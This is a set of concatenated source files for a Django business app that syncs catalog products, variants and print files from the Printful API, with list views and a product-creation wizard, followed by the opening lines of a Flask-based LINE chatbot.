verbose_name = _("WP Media")
verbose_name_plural = _("WP Media")
def __str__(self):
return u'%s' % self.slug
def get_absolute_url(self):
return reverse('business:business_wpmedia_detail', args=(self.slug,))
def get_update_url(self):
return reverse('business:business_wpmedia_update', args=(self.slug,))
class wpMediaSize(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
file = CharField(_("File"), max_length=255,
default="", blank=True, null=True)
mime_type = CharField(_("MIME Type"), max_length=255,
default="", blank=True, null=True)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
source_url = URLField(_("Source URL"), default="", blank=True, null=True)
# Relationship Fields
wpmedia = ForeignKey('business.wpMedia', verbose_name=_("Media"))
class Meta:
ordering = ('-pk',)
verbose_name = _("WP Media Size")
verbose_name_plural = _("WP Media Sizes")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_wpmediasize_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_wpmediasize_update', args=(self.pk,))
class pfCountry(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=50,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
class Meta:
ordering = ('code',)
verbose_name = _("Country")
verbose_name_plural = _("Countries")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown Country")
def get_absolute_url(self):
return reverse('business:business_pfcountry_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfcountry_update', args=(self.pk,))
@staticmethod
def api_pull(store=None, key=None):
"""
Update the Country and State objects from the Printful API.
:param store: Optional bzStore object. If not provided, method will
attempt to use the first store from the database if it exists.
:param key: If a key is provided, then it is used instead of store.
This is especially useful for when you're first creating a
store, and so avoids a race condition.
"""
if key:
api = pyPrintful(key=key)
else:
_storeObj = pfStore.get_store(store)
api = pyPrintful(key=_storeObj.key)
countries = api.get_countries_list()
for c in countries:
cObj, cCreated = pfCountry.objects.update_or_create(
code=c['code'],
defaults={
'name': c['name']
}
)
if c['states']:
for s in c['states']:
sObj, sCreated = pfState.objects.update_or_create(
code=s['code'],
pfcountry=cObj,
defaults={
'name': s['name'],
}
)
def get_states(self):
return pfState.objects.filter(pfcountry=self)
get_states.short_description = _("States")
def num_states(self):
return self.get_states().count()
num_states.short_description = _("States")
class pfState(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=50,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
pfcountry = ForeignKey('business.pfCountry', verbose_name=_("Country"))
class Meta:
ordering = ('pfcountry__code', 'code',)
verbose_name = _("State")
verbose_name_plural = _("States")
def __str__(self):
if self.code and self.name:
return "{} - {}".format(self.code, self.name)
elif self.name:
return "{}".format(self.name)
return _("Unknown State")
def get_absolute_url(self):
return reverse('business:business_pfstate_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfstate_update', args=(self.pk,))
class pfSyncProduct(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=200,
default="", blank=True, null=True)
external_id = CharField(_("External ID"), max_length=200,
default="", blank=True, null=True)
variants = IntegerField(_("Variant Count"), default=0)
synced = IntegerField(_("Synced"), default=0)
# Relationship Fields
pfstore = ForeignKey('business.pfStore', verbose_name=_("Store"))
class Meta:
ordering = ('-pk',)
verbose_name = _("Sync Product")
verbose_name_plural = _("Sync Products")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_pfsyncproduct_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfsyncproduct_update',
args=(self.pk,))
class pfSyncVariant(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=200,
default="", blank=True, null=True)
external_id = CharField(_("External ID"), max_length=200,
default="", blank=True, null=True)
synced = BooleanField(_("Synced"), default=False)
# Relationship Fields
pfsyncproduct = ForeignKey(
'business.pfSyncProduct', verbose_name=_("Sync Product"))
files = ManyToManyField('business.pfPrintFile', blank=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("Sync Variant")
verbose_name_plural = _("Sync Variants")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_pfsyncvariant_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfsyncvariant_update',
args=(self.pk,))
class pfSyncItemOption(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=200,
default="", blank=True, null=True)
value = CharField(_("Value"), max_length=255,
default="", blank=True, null=True)
# Relationship Fields
pfsyncvariant = ForeignKey('business.pfSyncVariant', )
class Meta:
ordering = ('-pk',)
verbose_name = _("Sync Item Option")
verbose_name_plural = _("Sync Item Options")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfsyncitemoption_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfsyncitemoption_update', args=(self.pk,))
class pfCatalogColor(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=3,
default="", blank=True, null=True)
name = CharField(_("Color"), max_length=255,
default="", blank=True, null=True)
label_clean = CharField(_("Clean Label"), max_length=255,
default="", blank=True, null=True)
hex_code = CharField(_("Color Hex Code"), max_length=255,
default="", blank=True, null=True)
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful Color")
verbose_name_plural = _("Printful Colors")
def __str__(self):
rv = []
if self.code:
rv.append(self.code)
if self.label_clean:
rv.append(self.label_clean)
elif self.name:
rv.append(self.name)
if rv:
return " - ".join(rv)
return _("Unknown Color")
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogcolor_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogcolor_update', args=(self.pk,))
def get_hex_code_clean(self):
        return (self.hex_code or "").replace("#", "")
class pfCatalogSize(commonBusinessModel):
# Fields
code = CharField(_("Code"), max_length=3,
default="", blank=True, null=True)
name = CharField(_("Size"), max_length=255,
default="", blank=True, null=True)
label_clean = CharField(_("Clean Label"), max_length=255,
default="", blank=True, null=True)
sort_group = CharField(_("Sort Group"), max_length=2,
default="", blank=True, null=True)
sort_order = CharField(_("Sort Order"), max_length=16,
default="", blank=True, null=True)
class Meta:
ordering = ('sort_group', 'sort_order',)
verbose_name = _("Printful Size")
verbose_name_plural = _("Printful Sizes")
def __str__(self):
rv = []
if self.code:
rv.append(self.code)
if self.label_clean:
rv.append(self.label_clean)
elif self.name:
rv.append(self.name)
if rv:
return " - ".join(rv)
return _("Unknown Size")
def get_absolute_url(self):
return reverse('business:business_pfcatalogsize_detail',
args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfcatalogsize_update',
args=(self.pk,))
class pfCatalogFileSpec(commonBusinessModel):
COLORSYSTEM_RGB = 'R'
COLORSYSTEM_CMYK = 'Y'
COLORSYSTEM_CHOICES = (
(COLORSYSTEM_RGB, "RGB"),
(COLORSYSTEM_CMYK, "CMYK"),
)
# Fields
name = CharField(_("Name"), max_length=5,
default="", blank=True, null=True)
note = TextField(_("Note"), default="", blank=True, null=True)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
width_in = DecimalField(_("Width (in)"), default=0,
decimal_places=2, max_digits=4)
height_in = DecimalField(_("Height (in)"), default=0,
decimal_places=2, max_digits=4)
ratio = CharField(_("Ratio"), max_length=32,
default="", blank=True, null=True)
colorsystem = CharField(_("Color System"), max_length=1,
default="R", choices=COLORSYSTEM_CHOICES)
class Meta:
ordering = ('name',)
verbose_name = _("Printful File Spec")
verbose_name_plural = _("Printful File Specs")
def __str__(self):
if self.name:
return self.name
return _("Unknown File Spec")
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogfilespec_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogfilespec_update', args=(self.pk,))
def save(self, *args, **kwargs):
if self.width and not self.width_in:
self.width_in = int(self.width / 300)
elif self.width_in and not self.width:
self.width = self.width_in * 300
if self.height and not self.height_in:
self.height_in = int(self.height / 300)
elif self.height_in and not self.height:
self.height = self.height_in * 300
# This should prevent ZeroDivisionError exceptions.
if not self.ratio and self.width and self.height:
_fraction = Fraction(int(self.width), int(self.height))
self.ratio = "{}:{}".format(
_fraction.numerator, _fraction.denominator)
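            # Worked example: width=3600, height=4800 -> Fraction(3600, 4800)
            # reduces to 3/4, so ratio is stored as "3:4".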
super(pfCatalogFileSpec, self).save(*args, **kwargs)
class pfCatalogFileType(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=255,
default="", blank=True, null=True)
title = CharField(_("Title"), max_length=255,
default="", blank=True, null=True)
additional_price = CharField(_("Additional Price"), max_length=100,
default="", blank=True, null=True)
# Relationship Fields
pfcatalogvariant = ForeignKey(
'business.pfCatalogVariant', verbose_name=_("Variant"))
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful File Type")
verbose_name_plural = _("Printful File Types")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogfiletype_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogfiletype_update', args=(self.pk,))
class pfCatalogOptionType(commonBusinessModel):
# Fields
pid = CharField(_("Printful ID"), max_length=255,
default="", blank=True, null=True)
title = CharField(_("Title"), max_length=255,
default="", blank=True, null=True)
type = CharField(_("Type"), max_length=255,
default="", blank=True, null=True)
additional_price = CharField(_("Additional Price"), max_length=100,
default="", blank=True, null=True)
# Relationship Fields
pfcatalogvariant = ForeignKey('business.pfCatalogVariant', )
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful Option Type")
verbose_name_plural = _("Printful Option Types")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogoptiontype_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogoptiontype_update', args=(self.pk,))
class pfCatalogBrand(commonBusinessModel):
name = CharField(_("Name"), max_length=128,
null=True, blank=True, default="")
def __str__(self):
if self.name:
return self.name
return "Unknown Brand"
class Meta:
ordering = ('-pk',)
verbose_name = _("Catalog Brand")
verbose_name_plural = _("Catalog Brands")
class pfCatalogType(commonBusinessModel):
name = CharField(_("Name"), max_length=128,
null=True, blank=True, default="")
def __str__(self):
if self.name:
return self.name
return "Unknown Type"
class Meta:
ordering = ('-pk',)
verbose_name = _("Catalog Product Type")
verbose_name_plural = _("Catalog Product Types")
class pfCatalogProduct(commonBusinessModel):
# Fields
is_active = BooleanField(_("Is Active?"), default=True)
pid = CharField(_("Printful ID"), max_length=255,
default="", blank=True, null=True)
ptype = ForeignKey('business.pfCatalogType', blank=True, null=True)
brand = ForeignKey('business.pfCatalogBrand', blank=True, null=True)
model = CharField(_("Model"), max_length=255,
default="", blank=True, null=True)
image = CharField(_("Image"), max_length=255,
default="", blank=True, null=True)
variant_count = IntegerField(_("Variants"), default=0)
class Meta:
ordering = ('brand', 'model')
verbose_name = _("Printful Product")
verbose_name_plural = _("Printful Products")
def __str__(self):
return self.get_friendly_name()
def get_friendly_name(self):
        if self.pid and self.brand and self.model:
return "{} / {} ({})".format(self.brand, self.model, self.pid)
return "Unknown Product"
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogproduct_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogproduct_update', args=(self.pk,))
def get_variants(self):
return pfCatalogVariant.objects.filter(pfcatalogproduct=self)
get_variants.short_description = _("Variants")
def get_colors(self):
"""
Get all color objects associated with this product's variants.
"""
return pfCatalogColor.objects.filter(pfcatalogvariant__in=self.get_variants()).distinct()
get_colors.short_description = _("Colors")
def get_colors_as_string(self):
c = self.get_colors()
if c:
rv = ", ".join([v.label for v in c])
else:
rv = "-"
return rv
get_colors_as_string.short_description = _("Available Colors")
def num_colors(self):
return self.get_colors().count()
num_colors.short_description = _("Colors")
def get_sizes(self):
return pfCatalogSize.objects.filter(pfcatalogvariant__in=self.get_variants()).distinct()
get_sizes.short_description = _("Sizes")
def get_sizes_as_string(self):
s = self.get_sizes()
if s:
rv = ", ".join([v.get_name() for v in s])
else:
rv = "-"
return rv
get_sizes_as_string.short_description = _("Available Sizes")
def num_sizes(self):
return self.get_sizes().count()
num_sizes.short_description = _("Sizes")
def get_out_of_stock(self):
return pfCatalogVariant.objects.filter(pfcatalogproduct=self, in_stock=False)
def num_out_of_stock(self):
return self.get_out_of_stock().count()
num_out_of_stock.short_description = _("Out of Stock")
@staticmethod
def api_pull(store=None, key=None):
"""
Update the product objects from the Printful API.
:param store: Optional bzStore object. If not provided, method will
attempt to use the first store from the database if it exists.
:param key: If a key is provided, then it is used instead of store.
This is especially useful for when you're first creating a
store, and so avoids a race condition.
"""
if key:
api = pyPrintful(key=key)
else:
_storeObj = pfStore.get_store(store)
api = pyPrintful(key=_storeObj.key)
logger.debug("pfCatalogProduct.api_pull / Making API Call")
products = api.get_product_list()
logger.debug("pfCatalogProduct.api_pull / All: is_active=False")
pfCatalogProduct.objects.all().update(is_active=False)
for p in products:
# {
# 'dimensions': {
# '16×20': '16×20',
# },
# 'options': [],
# 'files': [
# {'id': 'preview', 'title': 'Mockup', 'type': 'mockup', 'additional_price': None}
# ]}
pType, tCreated = pfCatalogType.objects.update_or_create(
name=p['type'],
defaults={}
)
pBrand, bCreated = pfCatalogBrand.objects.update_or_create(
name=p['brand'],
defaults={}
)
pObj, pCreated = pfCatalogProduct.objects.update_or_create(
pid=p['id'],
defaults={
'brand': pBrand,
'variant_count': cleanValue(p['variant_count']),
'ptype': pType,
'model': cleanValue(p['model']),
'image': cleanValue(p['image']),
'is_active': True,
}
)
logger.debug("pfCatalogProduct.api_pull / {} {}", pCreated, pObj)
# Handle 'files'
# Handle 'dimensions'
if pObj.variant_count:
variants = api.get_product_info(pObj.pid)
pfCatalogVariant.objects.all().update(is_active=False)
for p in variants['variants']:
colorObj = None
if p['color']:
colorObj, colCreated = pfCatalogColor.objects.update_or_create(
name=cleanValue(p['color']),
defaults={
'hex_code': cleanValue(p['color_code']),
}
)
sizeObj = None
if p['size']:
sizeObj, szCreated = pfCatalogSize.objects.update_or_create(
name=cleanValue(p['size']),
defaults={}
)
vObj, vCreated = pfCatalogVariant.objects.update_or_create(
pid=p['id'],
pfcatalogproduct=pObj,
defaults={
'name': cleanValue(p['name']),
'image': cleanValue(p['image']),
'in_stock': cleanValue(p['in_stock'], False),
'price': Decimal(str(cleanValue(p['price']))),
'pfcolor': colorObj,
'pfsize': sizeObj,
}
)
# Handle 'options' (Attach to variants)
@staticmethod
def get_avail_sizes(obj):
return obj.get_sizes()
@staticmethod
def get_avail_colors(obj):
return obj.get_colors()
class pfCatalogVariant(commonBusinessModel):
# Fields
is_active = BooleanField(verbose_name=_("Is Active"), default=True)
pid = CharField(_("Printful ID"), max_length=16,
default="", blank=True, null=True)
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
image = CharField(_("Image"), max_length=255,
default="", blank=True, null=True)
price = CharField(_("Price"), max_length=255,
default="", blank=True, null=True)
in_stock = BooleanField(_("In Stock"), default=False)
weight = DecimalField(_("Weight (oz)"), default=0, blank=True,
null=True, decimal_places=2, max_digits=5)
# Relationship Fields
pfsize = ForeignKey('business.pfCatalogSize', blank=True,
null=True, verbose_name=_("Size"))
pfcolor = ForeignKey('business.pfCatalogColor', blank=True,
null=True, verbose_name=_("Color"))
pfcatalogproduct = ForeignKey('business.pfCatalogProduct', blank=True,
null=True, verbose_name=_("Catalog Product"))
class Meta:
ordering = ('-pk',)
verbose_name = _("Printful Variant")
verbose_name_plural = _("Printful Variants")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse(
'business:business_pfcatalogvariant_detail', args=(self.pk,))
def get_update_url(self):
return reverse(
'business:business_pfcatalogvariant_update', args=(self.pk,))
class MimeType(commonBusinessModel):
name = CharField(_("Name"), max_length=255,
null=True, blank=True, default="")
clean_name = CharField(_("Friendly Name"), max_length=255,
null=True, blank=True, default="")
def __str__(self):
if self.clean_name:
return self.clean_name
if self.name:
return self.name
return "Unknown"
class Meta:
ordering = ('clean_name', 'name',)
verbose_name = _("MIME Type")
verbose_name_plural = _("MIME Types")
class pfFileType(commonBusinessModel):
name = CharField(_("Name"), max_length=255,
null=True, blank=True, default="")
clean_name = CharField(_("Friendly Name"), max_length=255,
null=True, blank=True, default="")
def __str__(self):
if self.clean_name:
return self.clean_name
if self.name:
return self.name
return "Unknown"
class Meta:
ordering = ('clean_name', 'name',)
verbose_name = _("File Type")
verbose_name_plural = _("File Types")
class pfFileStatus(commonBusinessModel):
name = CharField(_("Name"), max_length=255,
null=True, blank=True, default="")
clean_name = CharField(_("Friendly Name"), max_length=255,
null=True, blank=True, default="")
def __str__(self):
if self.clean_name:
return self.clean_name
if self.name:
return self.name
return "Unknown"
class Meta:
ordering = ('clean_name', 'name',)
verbose_name = _("File Status")
verbose_name_plural = _("File Statuses")
class pfPrintFile(commonBusinessModel):
# Fields
pid = IntegerField(_("Printful ID"), default=0)
phash = CharField(_("Hash"), max_length=255,
default="", blank=True, null=True)
url = CharField(_("URL"), max_length=255,
default="", blank=True, null=True)
filename = CharField(_("Filename"), max_length=255,
default="", blank=True, null=True)
size = IntegerField(_("Size"), default=0)
width = IntegerField(_("Width"), default=0)
height = IntegerField(_("Height"), default=0)
dpi = IntegerField(_("DPI"), default=0)
created = CharField(_("Created"), max_length=255,
default="", blank=True, null=True)
thumbnail_url = CharField(
_("Thumbnail URL"), max_length=255, default="", blank=True, null=True)
preview_url = CharField(
_("Preview URL"), max_length=255, default="", blank=True, null=True)
visible = BooleanField(_("Visible"), default=False)
is_active = BooleanField(_("Active"), default=True)
# Relationship Fields
mime_type = ForeignKey("business.MimeType",
verbose_name="MIME Type", blank=True, null=True)
ptype = ForeignKey("business.pfFileType",
verbose_name="File Type", blank=True, null=True)
status = ForeignKey("business.pfFileStatus",
verbose_name="File Status", blank=True, null=True)
    pfstore = ForeignKey('business.pfStore', verbose_name="Store")
    filespec = ForeignKey(
        'business.pfCatalogFileSpec', verbose_name="File Spec", blank=True, null=True)
class Meta:
ordering = ('-created',)
verbose_name = _("Printful File")
verbose_name_plural = _("Printful Files")
def __str__(self):
return u'%s' % self.pk
def get_absolute_url(self):
return reverse('business:business_pfprintfile_detail', args=(self.pk,))
def get_update_url(self):
return reverse('business:business_pfprintfile_update', args=(self.pk,))
def dimensions(self, dpi=300):
if self.width and self.height:
rv = '{}" x {}" / {}dpi'.format(
                str(int(self.width / dpi)),
                str(int(self.height / dpi)),
dpi,
)
else:
rv = "Unknown"
return rv
dimensions.short_description = "Dimensions"
@staticmethod
def api_pull(store=None):
"""
Update the file list from your Printful store.
:param store: pfStore object.
"""
if store:
_storeObj = pfStore.get_store(store)
api = pyPrintful(key=_storeObj.key)
else:
raise("A pfStore object is required.")
# TODO Implement paging in this call.
logger.debug("pfPrintFile.api_pull / Making API Call")
files = api.get_file_list()
logger.debug("pfPrintFile.api_pull / All: is_active=False")
pfPrintFile.objects.all().update(is_active=False)
for p in files:
if p['mime_type']:
_mimetype, c = MimeType.objects.update_or_create(
name=p['mime_type'],
defaults={}
)
else:
_mimetype = None
if p['status']:
_status, c = pfFileStatus.objects.update_or_create(
name=p['status'],
defaults={}
)
else:
_status = None
if p['type']:
_ptype, c = pfFileType.objects.update_or_create(
name=p['type'],
defaults={}
)
else:
_ptype = None
pObj, pCreated = pfPrintFile.objects.update_or_create(
pid=p['id'],
pfstore=_storeObj,
defaults={
'is_active': True,
'phash': cleanValue(p['hash']),
'url': cleanValue(p['url']),
'filename': cleanValue(p['filename']),
'size': cleanValue(p['size'], 0),
'width': cleanValue(p['width'], 0),
'height': cleanValue(p['height'], 0),
'dpi': cleanValue(p['dpi'], 0),
'created': cleanValue(p['created']),
'thumbnail_url': cleanValue(p['thumbnail_url']),
'preview_url': cleanValue(p['preview_url']),
'visible': cleanValue(p['visible'], True),
'mime_type': _mimetype,
'status': _status,
'ptype': _ptype,
}
)
logger.debug("pfPrintFile.api_pull / {} {}", pCreated, pObj)
class pfAddress(commonBusinessModel):
# Fields
name = CharField(_("Name"), max_length=255,
default="", blank=True, null=True)
company = CharField(_("Company"), max_length=255,
default="", blank=True, null=True)
address1 = CharField(_("Address 1"), max_length=255,
default="", blank=True, null=True)
address2 = CharField(_("Address 2"), max_length=255,
default="", blank=True, null=True)
city = CharField(_("City"), max_length=255,
default="", blank=True, null=True)
state = ForeignKey("business.pfState", verbose_name=_(
"State"), blank=True, null=True)
country = ForeignKey("business.pfCountry", verbose_name=_(
"Country"), blank=True, null=True)
zip = CharField(_("Postal Code"), max_length=24,
default="", blank=True, null=True)
phone = CharField(_("Phone"), max_length=24,
default="", blank=True, null=True)
email = EmailField(_("Email"), default="", blank=True, null=True)
class Meta:
ordering = ('name',)
verbose_name = _("Address")
verbose_name_plural = _("Addresses")
def __str__(self):
if self.name and self.company:
return ", ".join([self.name, self.company])
return "Unnamed Address"
def asHTML(self):
"""
Returns an HTML div, formatted in a 'standard' way:
Name
Company
Address1
Address2
Zip City, State
Country
Tel: <Phone>
E-Mail: <Email>
"""
rv = []
rv.append("<div class='element-address'>")
if self.name:
rv.append(self.name + "<br/>")
if self.company:
rv.append(self.company + "<br/>")
if self.address1:
rv.append(self.address1 + "<br/>")
if self.address2:
rv.append(self.address2 + "<br/>")
if self.zip:
rv.append(self.zip + " ")
if self.city:
rv.append(self.city + ", ")
if self.state:
rv.append(self.state.code)
if self.country:
rv.append("<br/>" + self.country.name)
if self.phone:
rv.append("<br/>Tel: " + self.phone)
if self.email:
rv.append(
"<br/>Email: <a href='mailto:[]'>[]</a>".replace('[]', self.email))
rv.append("</div>")
return "".join(rv)
```
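Taken together, these models drive a one-way sync from the Printful API. A minimal bootstrap sketch, assuming a valid API key (the key string below is a placeholder) and that `business.models` is the module shown above:
```python
# Minimal sketch of the sync flow implied by the models above.
# "YOUR_PRINTFUL_API_KEY" is a placeholder, not a real credential.
from business.models import pfStore, pfCatalogProduct, pfPrintFile

store = pfStore(code="PF1", name="Demo Store", key="YOUR_PRINTFUL_API_KEY")
store.save()  # save() seeds pfCountry/pfState if empty, pulls store info, pushes packing-slip data

pfCatalogProduct.api_pull(store=store)  # mirror the Printful catalog (products, variants, colors, sizes)
pfPrintFile.api_pull(store=store)       # mirror the store's uploaded print files
```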
#### File: business/views/app_product.py
```python
from django.core.urlresolvers import reverse, reverse_lazy
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse
from django.shortcuts import render
from django.views import View
from django.views.generic.base import TemplateView
from django.views.generic import DetailView, ListView, UpdateView, CreateView
from django_tables2 import *
from business.models import *
from business.forms import *
from business.tables import *
from business.helper_backend import commonListView
class appProductCommonListView(commonListView):
active_app = 'product'
active_apptitle = 'Product Catalog'
object_icon = 'sunglasses'
class appProductCommonUpdateView(commonUpdateView):
active_app = 'product'
active_apptitle = 'Product Catalog'
object_icon = 'sunglasses'
class appProductCommonCreateView(commonCreateView):
active_app = 'product'
active_apptitle = 'Product Catalog'
object_icon = 'sunglasses'
class appProductHome(TemplateView):
template_name = "app_product/home.html"
def get_context_data(self, **kwargs):
context = super(appProductHome, self).get_context_data(**kwargs)
context['active_app'] = "product"
context['active_apptitle'] = "Product Catalog"
context['products'] = bzProduct.objects.all()
if context['products']:
try:
if 'product' in self.kwargs:
context['active_product'] = bzProduct.objects.get(
pk=self.kwargs['product'])
else:
context['active_product'] = context['products'][0]
except ObjectDoesNotExist:
context['active_product'] = context['products'][0]
context['table_variants'] = bzProductVariantTable(
bzProductVariant.objects.filter(
bzproduct=context['active_product'])
)
return context
class appProductDetail(TemplateView):
template_name = "app_product/product_detail.html"
model = bzProduct
# class appProductCreate(CreateView):
# model = bzProduct
# form_class = bzProductForm
# template_name = "business/object_form.html"
# success_url = reverse_lazy('business:app_product_home')
#
# def get_context_data(self, **kwargs):
# context = super(appProductCreate,
# self).get_context_data(**kwargs)
# context['mode'] = "create"
# context['active_app'] = "product"
# context['object_name'] = "Product"
# context['active_apptitle'] = "Product Catalog"
# context['action_list'] = reverse('business:app_product_home')
# return context
class appProductUpdate(appProductCommonUpdateView):
model = bzProduct
form_class = bzProductForm
template_name = "business/object_form.html"
success_url = reverse_lazy('business:app_product_home')
def get_context_data(self, **kwargs):
context = super(appProductUpdate,
self).get_context_data(**kwargs)
context['mode'] = "update"
context['action_list'] = reverse('business:app_product_home')
return context
```
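A plausible URLconf for these views; the `app_product_home` route name comes from the `reverse()` calls in this file, while the URL patterns and the other route names are assumptions:
```python
# Hypothetical urls.py wiring for the views above (Django 1.x style,
# matching the django.core.urlresolvers import used in this project).
from django.conf.urls import url

from business.views.app_product import appProductHome, appProductUpdate

urlpatterns = [
    url(r'^product/$', appProductHome.as_view(), name='app_product_home'),
    url(r'^product/(?P<product>\d+)/$', appProductHome.as_view(), name='app_product_by_pk'),
    url(r'^product/(?P<pk>\d+)/edit/$', appProductUpdate.as_view(), name='app_product_update'),
]
```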
#### File: business/wizards/bzProductCreate.py
```python
from __future__ import unicode_literals
from django import forms
from crispy_forms.helper import *
from crispy_forms.layout import *
from crispy_forms.bootstrap import *
from django.contrib.auth import get_user_model
from business.models import *
from business.forms import *
from crispy_unforms.layout import *
from formtools.wizard.views import SessionWizardView
from django.core.urlresolvers import reverse, reverse_lazy
from django.http import HttpResponse
from django.shortcuts import redirect
from django.contrib import messages
class bzProductFormWizard_step1(businessCommonForm):
"""
bzProductFormWizard. Step 1.
Collects the name, code (SKU base), design and Vendor Product from the user.
"""
form_layout = Layout(
Div(
HTML("""<h4>Step 1</h4>
<p>Lorem.</p>"""),
css_class="col-md-4"
),
Div(
Fieldset("",
"code",
"name"),
css_class="col-md-3"
),
Div(
Fieldset("", "bzDesign", "pfProduct"),
css_class="col-md-4"
),
)
class Meta:
model = bzProduct
fields = ['code', 'name', 'bzDesign', 'pfProduct', ]
class bzProductFormWizard_step2(businessCommonForm):
"""
    bzProductFormWizard. Step 2.
Assign colors and sizes
"""
form_layout = Layout(
Div(
HTML("""<h4>Step 2: Variant Matrix</h4>
<p>You are creating a {{ wizard.form.pfProduct }}. Now, choose the combination of colors and sizes that you'd like to offer for this product.</p>"""),
css_class="col-md-4"
),
Div(
Field('colors', css_class='chosen',),
css_class="col-md-4"
),
Div(
Field('sizes', css_class='chosen',),
css_class="col-md-4"
),
)
class Meta:
model = bzProduct
fields = ['colors', 'sizes']
class bzProductFormWizard_step3(businessCommonForm):
"""
bzProductFormWizard. Step 3.
Confirms bzRenderings & Publish
"""
form_layout = Layout(
HTML("Step 3")
)
class Meta:
model = bzProduct
fields = []
class bzProductFormWizard(SessionWizardView):
form_list = [
bzProductFormWizard_step1,
bzProductFormWizard_step2,
bzProductFormWizard_step3
]
template_name = "business/object_form.html"
def get_context_data(self, **kwargs):
context = super(bzProductFormWizard,
self).get_context_data(**kwargs)
context['mode'] = "create"
context['active_app'] = "product"
context['active_apptitle'] = "Product Catalog"
context['object_name'] = "Product"
context['object_icon'] = "sunglasses"
context['action_list_label'] = "Back to List"
context['wizardstepcount'] = range(1, self.steps.count + 1)
context['action_list'] = reverse_lazy('business:app_product_home')
# if self.steps.step1 == 1:
# self.fields['sizes'] =
# self.fields['employee'].queryset = Employee.objects.filter(project_id=self.instance.project_id)
#
if self.steps.count > self.steps.step1:
context['action_list_save_label'] = "Next"
return context
def get_form_initial(self, step):
initial = {}
if step == '1': # (Step 2 - zero based)
# pfCP = self.storage.request['0-pfProduct']
data = self.storage.get_step_data('0')
pfCP = data.get('0-pfProduct', "")
if pfCP:
obj = pfCatalogProduct.objects.get(id=pfCP)
initial['colors'] = pfCatalogProduct.get_avail_colors(obj)
initial['sizes'] = pfCatalogProduct.get_avail_sizes(obj)
return self.initial_dict.get(step, initial)
def process_step(self, form):
if self.steps.step1 == 1:
pass
# if(form['pfProduct']):
# print("YEP")
# print(type(form))
# print(pfCatalogProduct.get_avail_sizes(form['pfProduct']))
elif self.steps.step1 == 2:
pass
elif self.steps.step1 == 3:
pass
return self.get_form_step_data(form)
def done(self, form_list, form_dict, **kwargs):
# data = [form.cleaned_data for form in form_list],
try:
instance = bzProduct()
for form in form_list:
for field, value in form.cleaned_data.items():
setattr(instance, field, value)
instance.save()
            messages.add_message(self.request, messages.SUCCESS,
                                 'Created new product: {}.'.format(instance))
        except Exception as e:
            messages.add_message(
                self.request, messages.ERROR,
                'An error occurred when trying to create a new product. {}'.format(e))
return redirect('business:app_product_home')
``` |
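One way to mount the wizard; the class and its three-step form list come from this file, while the URL pattern and route name below are assumptions:
```python
# Hypothetical URL wiring for the three-step product wizard above.
from django.conf.urls import url

from business.wizards.bzProductCreate import bzProductFormWizard

urlpatterns = [
    url(r'^product/new/$', bzProductFormWizard.as_view(), name='app_product_create'),
]
```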
{
"source": "5610110083/ppap",
"score": 2
} |
#### File: 5610110083/ppap/app.py
```python
from __future__ import unicode_literals
import os
import sys
import time
from argparse import ArgumentParser
from flask import Flask, request, abort
from linebot import (
LineBotApi, WebhookParser, WebhookHandler
)
from linebot.exceptions import (
InvalidSignatureError
)
from linebot.models import (
MessageEvent, TextMessage, TextSendMessage,
SourceUser, SourceGroup, SourceRoom,
TemplateSendMessage, ConfirmTemplate, MessageTemplateAction,
ButtonsTemplate, URITemplateAction, PostbackTemplateAction,
CarouselTemplate, CarouselColumn, PostbackEvent,
StickerMessage, StickerSendMessage, LocationMessage, LocationSendMessage,
ImageMessage, VideoMessage, AudioMessage,
UnfollowEvent, FollowEvent, JoinEvent, LeaveEvent, BeaconEvent, ImagemapSendMessage, BaseSize, URIImagemapAction, MessageImagemapAction, ImagemapArea
)
app = Flask(__name__)
# get channel_secret and channel_access_token from your environment variable
